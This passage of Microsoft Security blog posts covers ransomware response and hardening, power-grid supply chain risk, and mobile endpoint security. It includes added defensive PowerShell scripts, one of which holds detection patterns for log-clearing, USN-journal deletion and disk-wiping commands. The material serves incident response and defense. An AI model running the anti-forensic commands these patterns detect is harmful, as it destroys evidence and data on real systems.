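#    so you can compare against your baseline rather than assume it should be off.
$winrm = Get-Service -Name WinRM -ErrorAction SilentlyContinue
$listeners = @()
if ($winrm -and $winrm.Status -eq 'Running') {
    $listeners = Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Keys -join ';' }
}
[pscustomobject]@{
    WinRMStatus  = if ($winrm) { $winrm.Status } else { 'NotInstalled' }
    WinRMStartup = if ($winrm) { $winrm.StartType } else { $null }
    Listeners    = $listeners -join ' | '
} | Format-List

if ($findings.Count -eq 0) {
    Write-Host 'No scheduled task or service launches PowerShell with remote-shell style arguments.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Run it elevated on a host already identified as affected. WinRM is legitimately enabled on most servers, so the finding there is a change from your baseline, not the service being on. An empty result does not clear the host: the same tooling also hides in WMI event subscriptions and registry run keys, which this script does not check.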

REvil ransomware

Possibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers – and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.

Other ransomware families

Other ransomware families used in human-operated campaigns during this period include:

  • Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks
  • RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials
  • MedusaLocker, which is possibly deployed via existing Trickbot infections
  • LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally

Immediate response actions for active attacks

We highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:

  • Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities
  • Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials
  • Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data

Customers using Microsoft Defender Advanced Threat Protection (ATP) can consult a companion threat analytics report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the Microsoft Threat Experts service can also refer to the targeted attack notification, which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.

If your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ “one-time use” infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic, behavior-based hunting where possible, and on hardening the infrastructure weaknesses favored by these attackers as soon as possible.

Investigate affected endpoints and credentials

Investigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.

  • For endpoints onboarded to Microsoft Defender ATP, use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.
  • Otherwise, check the Windows Event Log for post-compromise logons—those that occur after or during the earliest suspected breach activity—with event ID 4624 and logon type 2 (interactive) or 10 (RemoteInteractive, that is, RDP). For any other timeframe, check for logon type 4 (batch, used by scheduled tasks) or 5 (service), because the credentials behind those logons are stored on the host and can be dumped.
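The following PowerShell script is an added example, not part of the original post, that applies the Windows Event Log check above on one host: it unpacks every event ID 4624, flags accounts with logon type 2 or 10 after the breach start, and lists accounts with logon type 4 or 5 regardless of time. The breach start time, the target computer name, and the exclusion list for well-known non-user principals are this example's assumptions and should be adjusted for your environment.

```powershell
# Added example (not from the Microsoft post): list the accounts whose credentials were
# exposed on a suspected-compromised host, using the event ID and logon types named above.
# Assumptions: run elevated on the host (or against it with -ComputerName), the Security
# log still covers the breach window, and $BreachStart is your earliest suspected breach time.
param(
    [Parameter(Mandatory)][datetime]$BreachStart,
    [string]$ComputerName = $env:COMPUTERNAME
)

$interactiveTypes  = 2, 10   # Interactive, RemoteInteractive (RDP): credentials were live in LSASS
$credentialedTypes = 4, 5    # Batch (scheduled task), Service: credentials stored in LSA Secrets

# Pull every 4624 and unpack EventData by field name; the .Properties array order differs
# between Windows versions, so the XML is the reliable way to read it. On a busy server,
# scope with StartTime in the filter hashtable if the log is very large.
$logons = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -ErrorAction Stop |
    ForEach-Object {
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Account   = '{0}\{1}' -f $data['TargetDomainName'], $data['TargetUserName']
            LogonType = [int]$data['LogonType']
            Source    = $data['IpAddress']
            Process   = $data['ProcessName']
        }
    } |
    # Drop machine accounts and well-known non-user principals; they are noise for this question.
    Where-Object { $_.Account -notmatch '\$$|ANONYMOUS LOGON|^NT AUTHORITY\\|^Window Manager\\|^Font Driver Host\\' }

# Interactive or RDP session after the breach started: assume the account is compromised.
$postBreach = $logons | Where-Object { $_.Time -ge $BreachStart -and $_.LogonType -in $interactiveTypes }
# Service and scheduled-task logons at any time: their secrets are dumpable from the registry.
$stored     = $logons | Where-Object { $_.LogonType -in $credentialedTypes }

$summary = @($postBreach | Select-Object Account, @{ n = 'Reason'; e = { 'Interactive/RDP logon after breach start' } }) +
           @($stored     | Select-Object Account, @{ n = 'Reason'; e = { 'Service/scheduled-task credential on host' } }) |
    Sort-Object Account, Reason -Unique

$summary | Format-Table -AutoSize

# $summary.Account is the reset/disable list for this host. Keep the service accounts in it:
# resetting only the interactive users leaves the LSA Secrets material valid.
```

The source address and process columns are kept on the $logons objects so you can pivot from an unexpected RDP logon to the host it came from, which is the next lateral-movement target to scope.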

Isolate compromised endpoints

Isolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. Isolate machines using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.

Address internet-facing weaknesses

Identify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as shodan.io, to augment your own data. Systems that should be considered of interest to attackers include:

  • RDP or Virtual Desktop endpoints without MFA
  • Citrix ADC systems affected by CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510
  • Microsoft SharePoint servers affected by CVE-2019-0604
  • Microsoft Exchange servers affected by CVE-2020-0688
  • Zoho ManageEngine systems affected by CVE-2020-10189

To further reduce organizational exposure, Microsoft Defender ATP customers can use the Threat and Vulnerability Management (TVM) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.

Inspect and rebuild devices with related malware infections

Many ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.

Building security hygiene to defend networks against human-operated ransomware

As ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions—credential hygiene, minimal privileges, and host firewalls—to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.

Apply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:

  • Randomize local administrator passwords using a tool such as LAPS.
  • Apply Account Lockout Policy.
  • Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.
  • Utilize host firewalls to limit lateral movement. Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.
  • Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
  • Follow standard guidance in the security baselines for Office and Office 365 and the Windows security baselines. Use Microsoft Secure Score to assess and measure security posture and get recommended improvement actions, guidance, and control.
  • Turn on tamper protection features to prevent attackers from stopping security services.
  • Turn on attack surface reduction rules, including rules that can block ransomware activity:
    • Use advanced protection against ransomware
    • Block process creations originating from PsExec and WMI commands
    • Block credential stealing from the Windows local security authority subsystem (lsass.exe)

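The host-level items in this list can be applied and verified with PowerShell. The script below is an added example, not part of the original post: it sets an account lockout policy, blocks inbound TCP 445 with the host firewall, turns on cloud-delivered protection for Microsoft Defender Antivirus, and enables the three attack surface reduction rules named above in audit mode before enforcement. The rule GUIDs are the documented IDs for those rules; the lockout values, the firewall rule name, and the audit-first rollout are this example's choices. LAPS and tamper protection are not set here, because LAPS is a separate installation and tamper protection is turned on from Microsoft Defender Security Center or Intune rather than from a local script.

```powershell
# Added example (not from the Microsoft post): apply the host-level hardening items on one
# Windows 10 / Windows Server host running Microsoft Defender Antivirus. Use it to validate
# settings on a pilot machine before pushing them through Group Policy or Intune; domain
# policy overrides the local lockout values set here.
#Requires -RunAsAdministrator

# 1. Account lockout policy: blunts RDP brute force against local accounts.
#    Threshold and durations are this example's choices.
net accounts /lockoutthreshold:10 /lockoutduration:30 /lockoutwindow:30 | Out-Null

# 2. Host firewall: block inbound SMB on endpoints that do not serve files. Do not apply this
#    to file servers or domain controllers, which must accept 445.
$ruleName = 'Block inbound SMB (lateral movement)'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP -LocalPort 445 `
        -Action Block -Profile Any | Out-Null
}

# 3. Cloud-delivered protection and sample submission for Microsoft Defender Antivirus.
Set-MpPreference -MAPSReporting Advanced -SubmitSamplesConsent SendAllSamples

# 4. Attack surface reduction rules named in the post. Roll out in AuditMode first, review
#    event ID 1122 in Microsoft-Windows-Windows Defender/Operational for what would have been
#    blocked, then switch $mode to 'Enabled'. The PsExec/WMI rule in particular can break
#    legitimate admin tooling, which is exactly what the audit period is for.
$asrRules = @{
    'c1db55ab-c21a-4637-bb3f-a12568109d35' = 'Use advanced protection against ransomware'
    'd1e49aac-8f56-4280-b9ba-993a6d77406c' = 'Block process creations originating from PsExec and WMI commands'
    '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from lsass.exe'
}
$mode = 'AuditMode'   # change to 'Enabled' after the audit period
foreach ($id in $asrRules.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $mode
    Write-Host ('ASR {0} ({1}) -> {2}' -f $id, $asrRules[$id], $mode)
}

# 5. Verify what is now in effect, including tamper protection, which must be enabled elsewhere.
$pref   = Get-MpPreference
$status = Get-MpComputerStatus
[pscustomobject]@{
    MAPSReporting      = $pref.MAPSReporting
    ASRRulesConfigured = @($pref.AttackSurfaceReductionRules_Ids).Count
    SMBBlockRule       = [bool](Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)
    TamperProtected    = $status.IsTamperProtected
} | Format-List
```

Keep the audit period long enough to cover a patch cycle and a month-end, since software deployment tools and backup agents are the usual sources of PsExec and WMI process creation that the second rule would block.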
For additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read Human-operated ransomware attacks: A preventable disaster.

Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware

What we’ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services—in this time of global crisis—that their attacks cause.

Human-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can’t break through a wall, they’ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.

Microsoft Threat Protection (MTP) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.

Through built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.

Microsoft Threat Protection is also part of a chip-to-cloud security approach that combines threat defense on the silicon, operating system, and cloud. Windows 10 platform security features such as address space layout randomization (ASLR) and Control Flow Guard (CFG), together with hardware-backed protections, harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On Secured-core PCs these mitigations are enabled by default.

We continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the Microsoft Detection and Response Team (DART) to help investigate and remediate.

Microsoft Threat Protection Intelligence Team

Appendix: MITRE ATT&CK techniques observed

Human-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here were commonly used during attacks against healthcare and critical services in April 2020.

Credential access

Persistence

Command and control

Discovery

Execution

Lateral movement

Defense evasion

  • T1070 Indicator Removal on Host | Clearing of event logs using wevtutil, removal of the USN journal using fsutil, and wiping of slack space on the drive using cipher.exe
  • T1089 Disabling Security Tools | Stopping or tampering with antivirus and other security software using ProcessHacker and exploitation of vulnerable software drivers
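The defense evasion entries above name specific commands, which makes them directly huntable. The following PowerShell script is an added example, not part of the original post: it searches the Security log for process creations matching wevtutil log clearing, fsutil USN journal deletion, cipher.exe free-space wiping, and ProcessHacker, and separately for event ID 1102, which is written when the Security log itself is cleared. It assumes process creation auditing (event ID 4688) with command-line logging is enabled; the regular expressions are this example's, written from the tool names in the appendix.

```powershell
# Added hunting example (not from the Microsoft post): find the anti-forensic commands under
# T1070 and the tooling under T1089 in the Security log of one host.
# Assumptions: 4688 auditing with "Include command line in process creation events" is on;
# without it only the image name is available and the fallback branch below is used.
param(
    [datetime]$Since = (Get-Date).AddDays(-30),
    [string]$ComputerName = $env:COMPUTERNAME
)

# Patterns match the command line with or without a full path and surrounding quotes.
$indicators = [ordered]@{
    'T1070 event log cleared (wevtutil)'   = 'wevtutil(\.exe)?"?\s+(cl|clear-log)\b'
    'T1070 USN journal deleted (fsutil)'   = 'fsutil(\.exe)?"?\s+usn\s+deletejournal'
    'T1070 free space wiped (cipher)'      = 'cipher(\.exe)?"?\s+/w:'
    'T1089 ProcessHacker launched'         = 'processhacker'
}
# When no command line was logged, an execution of these binaries still deserves a look.
$imageOnly = 'wevtutil|fsutil|cipher|processhacker'

function Read-EventData([System.Diagnostics.Eventing.Reader.EventRecord]$Event) {
    # Unpack <EventData><Data Name=...> into a hashtable keyed by field name.
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    return $data
}

$hits = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $data = Read-EventData $_
        $user = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
        $cmd  = $data['CommandLine']
        if ($cmd) {
            foreach ($name in $indicators.Keys) {
                if ($cmd -match $indicators[$name]) {
                    [pscustomobject]@{ Time = $_.TimeCreated; Indicator = $name; User = $user; Parent = $data['ParentProcessName']; Detail = $cmd }
                }
            }
        } elseif ([IO.Path]::GetFileName($data['NewProcessName']) -match $imageOnly) {
            [pscustomobject]@{ Time = $_.TimeCreated; Indicator = 'Image only: enable command-line auditing'; User = $user; Parent = $data['ParentProcessName']; Detail = $data['NewProcessName'] }
        }
    }

# 1102 survives the clear it records and carries the subject in <UserData>, not <EventData>,
# so it is the one signal left when the attacker wiped everything else.
$cleared = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 1102; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $u = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
        [pscustomobject]@{ Time = $_.TimeCreated; Indicator = 'T1070 Security log cleared (1102)'; User = ('{0}\{1}' -f $u.SubjectDomainName, $u.SubjectUserName); Parent = $null; Detail = $_.Message.Split("`n")[0] }
    }

$results = @($hits; $cleared) | Where-Object { $_ }
if (-not $results) {
    Write-Host ('No indicator removal or security tool tampering found on {0} since {1}.' -f $ComputerName, $Since)
} else {
    $results | Sort-Object Time | Format-Table -AutoSize -Wrap
}
```

A hit on any of these is worth escalating on its own: legitimate administration almost never clears the Security log or deletes the USN journal, and the Parent column usually points straight at the attacker's shell or remote-execution tool.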

Impact

The post Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk appeared first on Microsoft Security.

Defending the power grid against supply chain attacks: Part 3 – Risk management strategies for the utilities industry

April 22nd, 2020 No comments

Over the last fifteen years, attacks against critical infrastructure (Figure 1) have steadily increased in both volume and sophistication. Because of the strategic importance of this industry to national security and economic stability, these organizations are targeted by sophisticated, patient, and well-funded adversaries. Adversaries often target the utility supply chain to insert malware into devices destined for the power grid. As modern infrastructure becomes more reliant on connected devices, the power industry must continue to come together to improve security at every step of the process.


Figure 1: Increased attacks on critical infrastructure

This is the third and final post in the “Defending the power grid against supply chain attacks” series. In the first blog I described the nature of the risk. Last month I outlined how utility suppliers can better secure the devices they manufacture. Today’s advice is directed at the utilities. There are actions you can take as individual companies and as an industry to reduce risk.

Implement operational technology security best practices

According to Verizon’s 2019 Data Breach Investigations Report, 80 percent of hacking-related breaches are the result of weak or compromised passwords. If you haven’t implemented multi-factor authentication (MFA) for all your user accounts, make it a priority. MFA can significantly reduce the likelihood that an attacker with a stolen password can access your company assets. I also recommend you take these additional steps to protect administrator accounts:

  • Separate administrative accounts from the accounts that IT professionals use to conduct routine business. While administrators are answering emails or conducting other productivity tasks, they may be targeted by a phishing campaign. You don’t want them signed into a privileged account when this happens.
  • Apply just-in-time privileges to your administrator accounts. Just-in-time privileges require that administrators only sign into a privileged account when they need to perform a specific administrative task. These sign-ins go through an approval process and have a time limit. This will reduce the possibility that someone is unnecessarily signed into an administrative account.

Figure 2: A “blue” path depicts how a standard user account is used for non-privileged access to resources like email and web browsing and day-to-day work. A “red” path shows how privileged access occurs on a hardened device to reduce the risk of phishing and other web and email attacks.

  • You also don’t want the occasional security mistake like clicking on a link when administrators are tired or distracted to compromise the workstation that has direct access to these critical systems.  Set up privileged access workstations for administrative work. A privileged access workstation provides a dedicated operating system with the strongest security controls for sensitive tasks. This protects these activities and accounts from the internet. To encourage administrators to follow security practices, make sure they have easy access to a standard workstation for other more routine tasks.

The following security best practices will also reduce your risk:

  • Whitelist approved applications. Define the list of software applications and executables that are approved to be on your networks. Block everything else. Your organization should especially target systems that are internet facing as well as Human-Machine Interface (HMI) systems that play the critical role of managing generation, transmission, or distribution of electricity.
  • Regularly patch software and operating systems. Implement a monthly practice to apply security patches to software on all your systems. This includes applications and operating systems on servers, desktop computers, mobile devices, network devices (routers, switches, firewalls, etc.), as well as Internet of Things (IoT) and Industrial Internet of Things (IIoT) devices. Attackers frequently target known security vulnerabilities.
  • Protect legacy systems. Segment legacy systems that can no longer be patched by using firewalls to filter out unnecessary traffic. Limit access to only those who need it by using Just In Time and Just Enough Access principles and requiring MFA. Once you set up these subnets, firewalls, and firewall rules to protect the isolated systems, you must continually audit and test these controls for inadvertent changes, and validate with penetration testing and red teaming to identify rogue bridging endpoints and design/implementation weaknesses.
  • Segment your networks. If you are attacked, it’s important to limit the damage. By segmenting your network, you make it harder for an attacker to compromise more than one critical site. Maintain your corporate network on its own network with limited to no connection to critical sites like generation and transmission networks. Run each generating site on its own network with no connection to other generating sites. This will ensure that should a generating site become compromised, attackers can’t easily traverse to other sites and have a greater impact.
  • Turn off all unnecessary services. Confirm that none of your software has automatically enabled a service you don’t need. You may also discover that there are services running that you no longer use. If the business doesn’t need a service, turn it off.
  • Deploy threat protection solutions. Services like Microsoft Threat Protection help you automatically detect, respond to, and correlate incidents across domains.
  • Implement an incident response plan: When an attack happens, you need to respond quickly to reduce the damage and get your organization back up and running. Refer to Microsoft’s Incident Response Reference Guide for more details.

Speak with one voice

Power grids are interconnected systems of generating plants, wires, transformers, and substations. Regional electrical companies work together to efficiently balance the supply and demand for electricity across the nation. These same organizations have also come together to protect the grid from attack. As an industry, working through organizations like the Edison Electric Institute (EEI), utilities can define security standards and hold manufacturers accountable to those requirements.

It may also be useful to work with the Federal Energy Regulatory Commission (FERC), the North American Electric Reliability Corporation (NERC), or the United States Nuclear Regulatory Commission (U.S. NRC) to better regulate the security requirements of products manufactured for the electrical grid.

Apply extra scrutiny to IoT devices

As you purchase and deploy IoT devices, prioritize security. Be careful about purchasing products from countries that are motivated to infiltrate critical infrastructure. Conduct penetration tests against all new IoT and IIoT devices before you connect them to the network. When you place sensors on the grid, you’ll need to protect them from both cyberattacks and physical attacks. Make them hard to reach and tamper-proof.

Collaborate on solutions

Reducing the risk of a destabilizing power grid attack will require everyone in the utility industry to play a role. By working with manufacturers, trade organizations, and governments, electricity organizations can lead the effort to improve security across the industry. For utilities in the United States, several public-private programs are in place to enhance the utility industry’s capabilities to defend its infrastructure and respond to threats.

Read Part 1 in the series: “Defending the power grid against cyberattacks”

Read “Defending the power grid against supply chain attacks: Part 2 – Securing hardware and software”

Read how Microsoft Threat Protection can help you better secure your endpoints.

Learn how MSRC developed an incident response plan

Bookmark the Security blog to keep up with our expert coverage on security matters. For more information about our security solutions visit our website. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Defending the power grid against supply chain attacks: Part 3 – Risk management strategies for the utilities industry appeared first on Microsoft Security.

Mobile security—the 60 percent problem

April 7th, 2020 No comments

Off the top of your head, what percentage of endpoints in your organization are currently protected?

Something in the 98 percent+ range?

Most enterprises would say having fewer than 2 percent of endpoint devices lacking adequate security would be considered good given the various changes, updates, etc. However, enterprises have traditionally focused security and compliance efforts on traditional computing devices (for example, servers, desktops, and laptops), which represent just 40 percent of the relevant endpoints. The remaining 60 percent of endpoints are mobile devices and are woefully under-protected. That’s a problem.

Mobile security is more important than ever

Mobile devices, both corporate-owned and bring your own device (BYOD), are now the dominant productivity platform in any enterprise organization, with more than 80 percent of daily work performed on a mobile device. These devices operate extensively outside of corporate firewalls, in the hands of users who may not prioritize precautions like vetting Wi-Fi networks or keeping their devices patched and updated. Mobile often represents a wandering corporate data repository.

These factors combine to cause headaches for security teams because, in short, mobile security has a significant gap in most organizations’ endpoint protection strategies.

The lack of protection for (and visibility into) these endpoints introduces significant risk and compliance concerns that show no sign of slowing down. Here are some statistics from Zimperium’s State of Enterprise Mobile Security Report, 2019, which contains data from more than 45 million anonymized endpoints from enterprises in a variety of industries and both local and national government agencies from around the world:

  • Mobile OS vendors created patches for 1,161 security vulnerabilities in 2019.
  • At the end of 2019, 48 percent of iOS devices were more than four versions behind the latest OS version and 58 percent of Android devices were more than two versions behind.
  • Twenty-four percent of enterprise mobile endpoints were exposed to device threats, not including outdated operating systems.
  • Nineteen percent of enterprise mobile endpoints experienced network-based attacks.
  • Sixty-eight percent of malicious profiles were considered “high-risk,” meaning they had elevated access that could lead to data exfiltration or full compromise.

Microsoft and Zimperium deliver comprehensive mobile security

The combination of Microsoft’s management and security solutions and Zimperium’s unique on-device mobile device security delivers unequaled protection for managed and unmanaged BYOD devices. Together, Microsoft and Zimperium have delivered numerous innovations for customers in areas such as:

An endpoint is an endpoint is an endpoint, and they all must be protected

Organizations now realize that mobile devices are unprotected endpoints that may hold, or have access to, the same information as a traditional endpoint. And while there is some overlap in what you protect (email, calendars, and so on), the way you solve the traditional endpoint security problem is completely different from the way you solve the mobile security problem.

So, what does all this really mean for an enterprise?

For a joint Microsoft and Zimperium international banking customer with employees in nine countries using 17,000 corporate and BYOD mobile devices, it means knowing that you are protected with Microsoft Endpoint Manager on Azure. It means knowing how many of your employees are putting your enterprise at risk with outdated iOS versions and high-risk profiles. It means having the ability to remediate and monitor your endpoints from one console. Our customer is in control of its infrastructure choices rather than having a vendor force a solution on it. In addition, both iOS and Android platforms are supported and protected. If a user were to switch from one device to another that runs a different OS, the person would simply re-download the Zimperium app and activate it.

Once deployed, the solution is capable of integrating simultaneously with unified endpoint management (UEM) solutions from multiple vendors. In other words, part of the organization, or specified users, can be managed with one UEM solution, and part of it by another. For joint Zimperium and Microsoft customers, this capability simplifies the migration from a third-party UEM to Microsoft Endpoint Manager while maintaining security during the migration. Zimperium provides visibility and security across the mobile infrastructure for customers who may have multiple UEM solutions deployed.

About Zimperium

Zimperium, the global leader in mobile device and app security, offers real-time, on-device protection against Android and iOS threats. The Zimperium platform leverages our award-winning machine-learning-based engine—z9—to protect mobile data, apps, and sessions against device compromises, network attacks, phishing attempts, and malicious apps.

To date, z9 has detected 100 percent of zero-day device exploits without requiring an update or suffering from the delays and limitations of cloud-based detection—something no other mobile security provider can claim.

Get a free enterprise trial

Interested in trying Zimperium in your Microsoft security environment? Contact us today for mobile device security with protection against network, device, phishing, and malicious app attacks.

The post Mobile security—the 60 percent problem appeared first on Microsoft Security.